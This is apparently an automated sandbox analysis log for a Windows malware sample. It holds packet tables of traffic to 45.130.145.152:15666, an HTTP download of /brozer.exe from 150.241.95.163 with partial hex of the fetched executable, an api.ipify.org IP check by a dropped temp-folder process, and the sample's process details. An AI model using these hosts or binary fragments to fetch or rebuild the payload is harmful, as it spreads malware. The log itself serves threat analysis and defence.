Nov 15, 2024 10:36:32.190865040 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190874100 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190881968 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190890074 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190905094 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190907955 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190917015 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190918922 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190927029 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190931082 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190948963 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190984011 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190987110 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190996885 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191004038 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191011906 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191020012 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191046000 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191082954 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191107988 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191118002 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191123962 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191132069 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191139936 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191147089 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191159010 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191164017 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191173077 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191179991 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191188097 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191195965 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191205025 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191216946 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191235065 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191248894 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191308975 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191327095 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191337109 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191344976 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191353083 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191356897 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191359997 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191364050 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191373110 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191381931 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191390038 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191390991 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191397905 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191411018 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191425085 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191466093 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191479921 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191488981 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191530943 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191534042 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191540003 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191549063 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191566944 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191575050 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191582918 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191586018 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191586018 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191612959 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191622019 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191622972 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191643953 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191644907 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191658020 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191662073 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191665888 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191673994 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191689968 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191694021 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191696882 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191699982 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191714048 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191772938 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191776991 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.191781998 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191790104 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191797972 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191812992 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191821098 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191828966 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.191860914 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.234481096 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.234770060 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.234854937 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.234930992 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.234999895 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235069990 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235158920 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235223055 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235300064 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235378027 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235450983 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235521078 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235584021 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.235626936 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.278781891 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.279082060 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.279210091 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.279289961 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.279387951 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.279433012 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.284241915 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.284406900 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.284498930 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.284544945 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295005083 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.295192003 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295598984 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295665026 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295725107 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295794010 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295849085 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295926094 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.295998096 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.296073914 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.296138048 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.296227932 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.296293974 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.296369076 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.302069902 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.302160978 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.346409082 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.346716881 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.346836090 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.346908092 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.346982956 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.347045898 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.347130060 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.347193956 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.347273111 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.347307920 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.392473936 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.392549038 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.433058977 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.433316946 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.433439970 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.433511972 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.433588982 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.438409090 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.438585997 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.484492064 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.484659910 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.527676105 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.531800032 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.531893969 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.531960011 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.536880970 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.537146091 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.537251949 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.537302971 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.584603071 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.587606907 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.612318993 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.612404108 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.613142014 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613313913 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613394976 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613497972 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613594055 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613694906 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613782883 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613879919 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.613900900 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.618277073 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.619618893 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.660593987 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.663548946 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.685259104 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.685513020 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.685961962 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686033964 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686099052 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686161041 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686218977 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686311960 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686371088 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686449051 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.686472893 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.691348076 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.691730022 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.691802025 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.691863060 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.691961050 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.692024946 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.692091942 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.692121029 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.736610889 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.743709087 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.760746002 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.761308908 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.761703968 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.761837006 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.761913061 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.761997938 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762068033 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762149096 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762226105 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762300968 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762372017 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762448072 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762520075 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762592077 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762670040 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762746096 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.762814045 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.766990900 CET	15666	49920	45.130.145.152	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 15, 2024 10:36:26.356133938 CET	192.168.2.6	1.1.1.1	0xda59	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 15, 2024 10:36:26.363104105 CET	1.1.1.1	192.168.2.6	0xda59	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 15, 2024 10:36:26.363104105 CET	1.1.1.1	192.168.2.6	0xda59	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 15, 2024 10:36:26.363104105 CET	1.1.1.1	192.168.2.6	0xda59	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49741	150.241.95.163	80	988	C:\Users\user\Desktop\9RM52QaURq.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 10:35:54.949767113 CET	74	OUT	GET /brozer.exe HTTP/1.1 Host: 150.241.95.163 Connection: Keep-Alive
Nov 15, 2024 10:35:55.836993933 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 15 Nov 2024 09:35:55 GMT Content-Type: application/octet-stream Content-Length: 2632704 Last-Modified: Thu, 14 Nov 2024 19:32:03 GMT Connection: keep-alive ETag: "67365033-282c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 54 97 d1 e9 35 f9 82 e9 35 f9 82 e9 35 f9 82 f9 b1 fa 83 e1 35 f9 82 f9 b1 fd 83 e6 35 f9 82 f9 b1 fc 83 ba 35 f9 82 a2 4d fc 83 48 35 f9 82 a2 4d fa 83 ee 35 f9 82 a2 4d fd 83 fa 35 f9 82 d1 b5 fc 83 eb 35 f9 82 a1 b0 fd 83 cd 35 f9 82 a2 4d f8 83 e2 35 f9 82 e9 35 f8 82 68 35 f9 82 a2 b0 f0 83 fa 35 f9 82 a2 b0 06 82 e8 35 f9 82 a2 b0 fb 83 e8 35 f9 82 52 69 63 68 e9 35 f9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e8 4f 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 6a 03 00 00 d6 24 00 00 00 00 00 f0 d0 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T555555MH5M5M555M55h5555Rich5PEdO4g")j$@(`T'd`(0(p,p(P'8'@.texthj `.rdatap$r$n@@.data(('@.pdatap,0(.'@@.rsrc`( (@@.relocPp("(@B
Nov 15, 2024 10:35:55.837017059 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 48 8d 0d 55 12 28 00 e8 a0 17 03 00 48 8d 0d d9 67 03 00 48 83 c4 28 e9 e8 bd 02 00 48 8d Data Ascii: H(HU(HgH(H1hHgH(H(hHhH(H9h@WAVHhH'H3HD$HLH+HuH$Hl$`H@H:
Nov 15, 2024 10:35:55.837032080 CET	104	IN	Data Raw: 40 08 4d 85 c0 0f 84 05 01 00 00 48 8b 4b 10 48 85 c9 74 14 48 ff c1 48 89 4b 10 48 8b 43 18 48 ff c8 48 89 43 18 eb 7c 49 8b cc ff 15 13 6e 03 00 4c 8b f8 48 89 7c 24 28 48 85 c0 0f 84 c7 00 00 00 0f b7 70 14 48 83 c6 18 48 03 f0 48 89 74 24 28 Data Ascii: @MHKHtHHKHCHHC\|InLH\|$(HpHHHt$(Df\|$ fE;ws&A
Nov 15, 2024 10:35:55.837383986 CET	1236	IN	Data Raw: 00 48 8b d6 49 8b cd e8 70 e0 01 00 85 c0 75 6a 8b 46 0c 49 03 c4 48 89 43 10 8b 46 08 48 89 43 18 48 8b 4b 10 48 85 c9 74 68 48 8b 43 18 48 85 c0 74 5f 4c 8b 43 08 49 3b c0 72 56 4c 8b f1 4d 2b f0 4c 03 f0 49 3b ce 77 48 48 8b 73 08 48 8b d1 48 Data Ascii: HIpujFIHCFHCHKHthHCHt_LCI;rVLM+LI;wHHsHHrmH;tZHKHHKHCHHCLH(Ht$(fAfDt$ bH{H{%H{H{\|$$D$$H\$PHt$XH\|$`Ld$hH0A_A^A]@SHH'
Nov 15, 2024 10:35:55.837424040 CET	212	IN	Data Raw: 48 89 bc 24 80 00 00 00 4c 8d 45 e0 48 89 45 d8 48 8d 7d d8 89 45 e0 48 8d 55 dc b9 0c 00 00 00 4c 89 7c 24 40 f3 aa 48 8d 4d d8 ff 15 e7 68 03 00 33 f6 83 7d d8 06 75 0e 83 7d dc 03 75 08 41 bf 01 00 00 00 eb 04 41 0f 97 c7 45 84 ff 74 15 48 8b Data Ascii: H$LEHEH}EHUL\|$@HMh3}u}uAAEtH\3L$D3H}HELEEHUuHMh}u}uD;sEtPA;sHGH@HL;
Nov 15, 2024 10:35:55.837460995 CET	1236	IN	Data Raw: 20 72 0d ff c7 48 83 c0 18 41 3b fe 72 f0 74 2d 8d 47 01 44 2b f7 8b c8 48 8d 57 01 48 83 c1 02 48 8d 14 57 48 8d 14 d3 4f 8d 04 76 49 c1 e0 03 48 8d 04 41 48 8d 0c c3 e8 3f 43 03 00 48 8d 0c 7f 41 b8 03 00 00 00 48 8d 3c cb b2 01 49 8b cc 4c 8d Data Ascii: rHA;rt-GD+HWHHWHOvIHAH?CHAH<ILMgHGEG$LgDo tCCL$EtHxK3H}HELEEHUHM\|g}u}t@tCC%H$
Nov 15, 2024 10:35:55.837496996 CET	1236	IN	Data Raw: 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8d 05 5c d4 04 00 48 89 01 0f 57 c0 0f 11 41 08 48 8d 05 d3 41 07 00 48 89 41 08 48 8d 05 10 3e 07 00 48 89 01 48 8b c1 c3 cc 48 83 ec 48 48 8d 4c 24 20 e8 Data Ascii: HH [HL$H\HWAHAHAH>HHHHHL$ H'HL$ HL$SH HHHHHSWHH_H=HHH [H]H@SH H]HHtHH [
Nov 15, 2024 10:35:55.837533951 CET	1236	IN	Data Raw: 02 00 4c 8b f0 4c 8b c6 48 89 73 10 49 8b d7 48 89 7b 18 49 8b ce e8 b9 39 03 00 41 c6 04 36 00 48 83 fd 0f 76 2d 48 8b 0b 48 8d 55 01 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1e 49 8b c8 e8 71 a9 02 Data Ascii: LLHsIH{I9A6Hv-HHUHrLAH'I+HAHwIqL3HLt$hH A__^][HT$SH0H3D$ HQ(WHCHCI@IB8uHD$ HH0[HT$SH0H3
Nov 15, 2024 10:35:55.837570906 CET	156	IN	Data Raw: ff 02 00 48 8b c3 48 8b 4c 24 38 48 33 cc e8 7d a2 02 00 48 8b 5c 24 68 48 8b 6c 24 70 48 83 c4 40 41 5e 5f 5e c3 e8 75 f6 ff ff 90 cc cc cc cc 40 53 56 41 54 41 55 41 57 48 83 ec 30 4c 8b 79 10 48 bb ff ff ff ff ff ff ff 7f 4c 8b a4 24 80 00 00 Data Ascii: HHL$8H3}H\$hHl$pH@A^_^u@SVATAUAWH0LyHL$HI+MHH;>Hl$pHiH\|$(Lt$ N4:IHH;wDHHHH+H;w3
Nov 15, 2024 10:35:55.837605000 CET	1236	IN	Data Raw: 48 8d 04 29 48 8b da 48 3b d0 48 0f 42 d8 48 8d 4b 01 48 85 c9 75 04 33 ff eb 4d 48 81 f9 00 10 00 00 72 3c 48 8d 41 27 48 3b c1 0f 86 df 00 00 00 eb 0e 48 b8 00 00 00 00 00 00 00 80 48 83 c0 27 48 8b c8 e8 3f a4 02 00 48 85 c0 0f 84 c4 00 00 00 Data Ascii: H)HH;HBHKHu3MHr<HA'H;HH'H?HHx'HHG#HLvM4?H^MHHvMHH3MII3HUC&HrHKH'H+HCHwVHHH3MII3C&H>HH\|$(
Nov 15, 2024 10:35:55.842885017 CET	1236	IN	Data Raw: f8 4c 8b 75 b0 4c 8b 65 a0 80 7b 19 00 75 54 4c 8b 6d b8 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 48 8d 4b 20 48 8d 55 a0 49 83 fd 0f 49 0f 47 d4 48 8b 71 10 48 83 79 18 0f 76 03 48 8b 09 4c 8b c6 4c 3b f6 4d 0f 42 c6 e8 83 39 03 00 85 c0 74 52 78 Data Ascii: LuLe{uTLm@fHK HUIIGHqHyvHLL;MB9tRxULH{tLmAuOIW HZHzvHHMHuHIGMI;LB59tyI;sH[L;rLuHuLuM~Hv2HVIHrH'Md$I+HH

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49924	172.67.74.152	443	4616	C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 09:36:27 UTC	100	OUT	GET / HTTP/1.1 Accept: text/html; text/plain; / Host: api.ipify.org Cache-Control: no-cache
2024-11-15 09:36:27 UTC	399	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 09:36:27 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e2e41c9ce3be7c7-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1786&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=738&delivery_rate=1538788&cwnd=251&unsent_bytes=0&cid=958f1b3ee51c73f9&ts=266&x=0"
2024-11-15 09:36:27 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 Data Ascii: 173.254.250.89

Target ID:	0
Start time:	04:35:46
Start date:	15/11/2024
Path:	C:\Users\user\Desktop\9RM52QaURq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9RM52QaURq.exe"
Imagebase:	0xd80000
File size:	37'376 bytes
MD5 hash:	9913A016528F9D9C4AAC737C6A06C596
Has elevated privileges:	true
